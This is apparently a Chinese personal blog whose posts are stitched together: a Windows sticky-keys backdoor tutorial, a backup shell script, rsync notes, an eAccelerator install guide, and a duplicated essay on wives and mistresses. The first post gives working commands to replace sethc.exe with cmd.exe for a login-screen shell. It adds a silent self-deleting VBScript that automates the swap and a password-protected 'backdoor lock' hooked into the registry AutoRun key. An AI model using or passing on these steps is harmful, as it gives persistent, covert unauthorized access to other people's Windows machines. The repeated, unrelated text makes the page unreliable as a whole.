meisw's blog

后门原理： 
在windows 2000/xp/vista下，按shift键5次，可以打开粘置，会运行sethc.exe，而且，在登录界面里也可以打开。这就让人联想到WINDOWS的屏保，将程序替换成cmd.exe后，就可以打开shell了。 
XP： 
将安装源光盘弹出（或将硬盘上的安装目录改名) 
cd %widnir%\system32\dllcache 
ren sethc.exe *.ex~ 
cd %widnir%\system32 
copy /y cmd.exe sethc.exe 
VISTA： 
takeown /f c:\windows\system32\sethc.exe 
cacls c:\windows\system32\sethc.exe /G administrator:F 
然后按XP方法替换文件 
在登录界面按5此SHIFT，出来cmd shell，然后…… 
后门扩展：
[复制此代码]CODE:
Dim obj, success   
Set obj = CreateObject("WScript.Shell")   
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True)   
success = obj.run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True)   
success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True)   
success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True)   
success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True)   
success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)  

第二句最有意思了.自动应答....以前就遇到过类似的问题 
再更新.加个自删除,简化代码...  
[复制此代码]CODE:
On Error Resume Next   
Dim obj, success   
Set obj = CreateObject("WScript.Shell")   
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)   
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName) 

后门锁扩展： 
allyesno注：可以采用cmd 锁 来进行cmdshell的密码验证 
用下面的后门锁的方法是 把代码保存为bdlock.bat 
然后修改注册表位置即可 
[复制此代码]CODE:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]  
"AutoRun"="bdlock.bat"  
@Echo Off  
title 后门登陆验证  
color a  
cls  
set temprandom=%RANDOM%  
echo 请输入验证码:%temprandom%  
set/p check=  
if "%check%"=="%temprandom%%temprandom%" goto passcheck  
if "%check%"=="%temprandom%" (  
rem 后门服务器验证  
rem 如果没有后门验证服务器请rem注释掉下一行代码  
if exist \192.168.8.8\backdoor$\pass goto passcheck  
)  
echo 验证失败  
pause  
exit  
:passcheck  
echo 验证成功  
If "%passcmdlock%"=="http://blog.csdn.net/freexploit/" Goto endx  
Set passcmdlock=http://blog.csdn.net/freexploit/  
:allyesno  
Set Errorlevel=>nul  
Echo 请输入验证密码？  
Set password=allyesno Is a pig>nul  
Set/p password=  
rem 万能密码  
if "%password%"=="allyesno is a sb" goto endx  
If %time:~1,1%==0 Set timechange=a  
If %time:~1,1%==1 Set timechange=b  
If %time:~1,1%==2 Set timechange=c  
If %time:~1,1%==3 Set timechange=d  
If %time:~1,1%==4 Set timechange=e  
If %time:~1,1%==5 Set timechange=f  
If %time:~1,1%==6 Set timechange=g  
If %time:~1,1%==7 Set timechange=h  
If %time:~1,1%==8 Set timechange=i  
If %time:~1,1%==9 Set timechange=j  
set/a sum=%time:~1,1%+%time:~1,1%  
Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul   
If "%errorlevel%"=="0" cls&Echo 口令正确&Goto End  
Echo 请联系客服咨询正确密码！&Goto allyesno  
:End  
Set password=>nul  
Set Errorlevel=>nul  
Echo  
:endx 

mybackup.sh
#!/bin/sh
umount /mnt/bak
mount /dev/sdb1 /mnt/bak

if [ `date +%d` = '01' ]   #每月1号进行完全备份
then
  bakdir="/mnt/bak/daybak/month/"`date +%m%d`
  zl=""  #进行完全备份
else
  bakdir="/mnt/bak/daybak/"`date +%d`
  zl="-N "`date +'%Y-%m-01 00:00:01'`;                 #差异备份
 #zl="-N "`date -d '-1 day' +'%Y-%m-%d 00:00:01'`     #日增量备份
fi

tmpbakdir=${bakdir}tmp
rm -rf ${tmpbakdir}
mkdir ${tmpbakdir}
tar "${zl}" -czf ${tmpbakdir}/www.tgz /var/www/html
tar "${zl}" -czf ${tmpbakdir}/etc.tgz /etc
tar "${zl}" -czf ${tmpbakdir}/mysql.tgz /var/lib/mysql
tar "${zl}" -czf ${tmpbakdir}/home.tgz /home
tar "${zl}" -czf ${tmpbakdir}/name.tgz /var/name
rm -rf $bakdir
mv $tmpbakdir $bakdir
umount /mnt/bak

把mybackup.sh 放到 /etc/cron.daly 中即实现可月循环 差异/增量 备份
为方便恢复数据我使用了差异备份,如果想节约空间可以使用日总量备份,不过那样恢复数据时刻就要麻烦点了,另外你也可以很容易把上面的脚本改为周循环

事项增量备份的另外方法是利用find命令，
例如只备份一天前修改过的文件
find /var/www -type f -mtime -1 -print>/tmp/filelist.txt 
tar -cz -T /tmp/filelist.txt -f /mnt/bak/www.tgz

使用rsync，每次只是同步修改过的部分，而且包括时间，权限，所有者都同步。
rsync -au /web/ /bak/
如果你要同步到其他的服务器可以：
rsync -au rsync://www.abc.com/bak/ /bak
或者是
rsync -au /bak rsync://www.abc.com/bak/

今天又细读了下mysql手册的集群部分,更深的理解了些疑问.

最近好懒,发现我现在越来越懒了,怎么办?

日志里显示

Cannot allocate memory: apr_thread_create: unable to create worker thread

调整 ThreadsPerChild 参数

http://www.eaccelerator.net/

　　http://www.arnot.info/eaccelerator/

　　----------------------------------------------------------------------

　　以下是网上找到的，关于eeaccelerator的教程

　　获得源代码：

　　wget http://internap.dl.sourceforge.net/sourceforge/eaccelerator/eaccelerator-0.9.4.tar.bz2

　　tar jxf eaccelerator-0.9.4.tar.bz2

　　编译：需要有autoconf支持

　　/usr/local/bin/phpize

　　./configure --enable-eaccelerator=shared --with-php-config=/usr/local/bin/php-config

　　make

　　sudo make install

　　配置增加如下：sudo vi php.ini

　　extension="/PATH/TO/eaccelerator.so"

　　eaccelerator.shm_size="16"

　　eaccelerator.cache_dir="/tmp/eaccelerator"

　　eaccelerator.enable="1"

　　eaccelerator.optimizer="1"

　　eaccelerator.check_mtime="1"

　　eaccelerator.debug="0"

　　eaccelerator.filter=""

　　eaccelerator.shm_max="0"

　　eaccelerator.shm_ttl="0"

　　eaccelerator.shm_prune_period="0"

　　eaccelerator.shm_only="0"

　　eaccelerator.compress="1"

　　eaccelerator.compress_level="9"

　　2006-06-03更新

　　在apache 2.2的升级过程中:发现php的相关模块都需要重新编译 需要注意包含哪个目录下的 eaccelerator.so 文件

　　/usr/local/lib/php/extensions$ ls -1

　　no-debug-non-zts-20020429

　　no-debug-zts-20020429

　　否则eAccelerator会无法生效, 我测试的结果在apache 2.2下eAccelerator的效果比apache 1.3下还差一些;

　　创建专用的缓存目录：

　　sudo mkdir /tmp/eaccelerator

　　sudo chmod 0777 /tmp/eaccelerator

　　重启一下apache：

　　sudo /home/apache/bin/apachectl restart

　　通过phpinfo()已经可以看到：eAccelerator启用了

　　This program makes use of the Zend Scripting Language Engine:

　　Zend Engine v1.3.0, Copyright (c) 1998-2004 Zend Technologies

　　with eAccelerator v0.9.4, Copyright (c) 2004-2004 eAccelerator, by eAccelerator

　　老婆，是婚前的红颜，新婚的情人，未来的保姆和私有品。不管男人承认与否，这种观念根深蒂固地存在于男人的脑海中。因此，他的老婆是他的记忆和依靠，可以给他温暖、饭菜、衣服，也可以给他心灵的安慰，但同时，老婆也是男人的出气筒和私有财产，男人把老婆看得如同箱底带有浪漫记忆的陈旧衣服，珍藏守侯，自己欣赏，但不能放飞。

　　情人，是男人的浪漫对象、游戏玩伴。只有在男人激"情蓬发的时候，情人才被重视，之后，便被遗忘，男人依旧欣赏自家箱底的珍藏。情人在男人的心目中只是春天里的郁金香，洋人节日里的红色玫瑰，仅此而已。所以说最傻的女人是做情人的女人，也是最不值的女人。

　　红颜，男人心灵的短暂慰籍，在男人有与老婆不能言谈的秘密之时，才会到红颜这里倾诉。也可以说，是一种短暂的心灵朋友罢了。红颜，永远是男人的水中花雾中月，心灵的距离时近时远，生活的距离永远遥不可及。红颜，虚幻的精神伴侣或许虚幻的短暂朋友。做红颜的女人，累。

　　老婆、情人和红颜，谁最累？肯定是都累。男人在有情人的那一刻，就已经从行动和心理以及感情上背叛了自己的老婆。裂痕已经存在，即使弥补，也还是有痕迹，不会光洁如初。老婆要时刻监视提防，从时间、经济、精力和心理上已经疲惫。对男人，老婆会因为社会环境等原因原谅他，但内心深处却是出现信任危机。这时的男人累吗？后院潜伏着火苗，时刻都有爆发的危险。这时的男人，恐怕不会那么潇洒，他会象陀螺一样来回奔走于情人和老婆之间，累。

　　情人呢？她曾经在一时付出了的真正的情感和其它，对男人的要求恐怕不次于初恋的人记忆老婆，所以，当男人在顾及家庭的时候，她会不舒服，会耿耿于怀。而男人因为受中国“三妻四妾”的影响，一旦情人成为负担，他会放弃；即使不放弃，也会同时寻找另外的情人。男人，这样攻于心计，穷于应付。一旦几个女人都把矛盾纠集在一起，这男人的日子就如同热锅上的蚂蚁，难熬。

　　女人，都有“从一而终”的思想，一旦成了男人的情人，无论还有没有感情，她都会象蛛网一样死死纠缠住这个男人。试想，把大好的时光投于一个把她看的得并不重要的男人身上，哀怨乞怜，哭闹辱骂，结果，使双方都感到恨多于爱，也许到了最后只有怨恨和疲惫了。累不？
　和朋友讨论起这个问题，朋友说：都累。我沉默半晌，觉得似乎还没有回答透彻：因为最累的人恐怕不是这三类女人，而是男人自己。

　　老婆，是婚前的红颜，新婚的情人，未来的保姆和私有品。不管男人承认与否，这种观念根深蒂固地存在于男人的脑海中。因此，他的老婆是他的记忆和依靠，可以给他温暖、饭菜、衣服，也可以给他心灵的安慰，但同时，老婆也是男人的出气筒和私有财产，男人把老婆看得如同箱底带有浪漫记忆的陈旧衣服，珍藏守侯，自己欣赏，但不能放飞。

　　情人，是男人的浪漫对象、游戏玩伴。只有在男人激“情蓬发的时候，情人才被重视，之后，便被遗忘，男人依旧欣赏自家箱底的珍藏。情人在男人的心目中只是春天里的郁金香，洋人节日里的红色玫瑰，仅此而已。所以说最傻的女人是做情人的女人，也是最不值的女人。

　　红颜，男人心灵的短暂慰籍，在男人有与老婆不能言谈的秘密之时，才会到红颜这里倾诉。也可以说，是一种短暂的心灵朋友罢了。红颜，永远是男人的水中花雾中月，心灵的距离时近时远，生活的距离永远遥不可及。红颜，虚幻的精神伴侣或许虚幻的短暂朋友。做红颜的女人，累。

　　老婆、情人和红颜，谁最累？肯定是都累。男人在有情人的那一刻，就已经从行动和心理以及感情上背叛了自己的老婆。裂痕已经存在，即使弥补，也还是有痕迹，不会光洁如初。老婆要时刻监视提防，从时间、经济、精力和心理上已经疲惫。对男人，老婆会因为社会环境等原因原谅他，但内心深处却是出现信任危机。这时的男人累吗？后院潜伏着火苗，时刻都有爆发的危险。这时的男人，恐怕不会那么潇洒，他会象陀螺一样来回奔走于情人和老婆之间，累。

　　情人呢？她曾经在一时付出了的真正的情感和其它，对男人的要求恐怕不次于初恋的人记忆老婆，所以，当男人在顾及家庭的时候，她会不舒服，会耿耿于怀。而男人因为受中国“三妻四妾”的影响，一旦情人成为负担，他会放弃；即使不放弃，也会同时寻找另外的情人。男人，这样攻于心计，穷于应付。一旦几个女人都把矛盾纠集在一起，这男人的日子就如同热锅上的蚂蚁，难熬。

　　女人，都有“从一而终”的思想，一旦成了男人的情人，无论还有没有感情，她都会象蛛网一样死死纠缠住这个男人。试想，把大好的时光投于一个把她看的得并不重要的男人身上，哀怨乞怜，哭闹辱骂，结果，使双方都感到恨多于爱，也许到了最后只有怨恨和疲惫了。累不？

　　红颜，是心灵朋友。既然能交心，那就不会没有感情，当男人劳累时走近，那也许是一种奇幻。但是，男人在心里把红颜至多当做一个暂时情绪的发泄对象和名誉上的浪漫罢了。红颜，在男人走近你的时候，不要在意，远离你的时候，不要期盼，这样才不会累。可是，如果这样，那还叫红颜吗？

　　老婆，是家常饭；情人，是调味品；红颜，是虚荣的点缀。如果有可能，男人都需要，但也仅是需要罢了。累。

　　男人，处在老婆、情人和红颜之间，极尽周旋之能事，累多？爱多？浪漫多？也许，只是一种消遣罢了。
　　红颜，是心灵朋友。既然能交心，那就不会没有感情，当男人劳累时走近，那也许是一种奇幻。但是，男人在心里把红颜至多当做一个暂时情绪的发泄对象和名誉上的浪漫罢了。红颜，在男人走近你的时候，不要在意，远离你的时候，不要期盼，这样才不会累。可是，如果这样，那还叫红颜吗？

　　老婆，是家常饭；情人，是调味品；红颜，是虚荣的点缀。如果有可能，男人都需要，但也仅是需要罢了。累。

　　男人，处在老婆、情人和红颜之间，极尽周旋之能事，累多？爱多？浪漫多？也许，只是一种消遣罢了。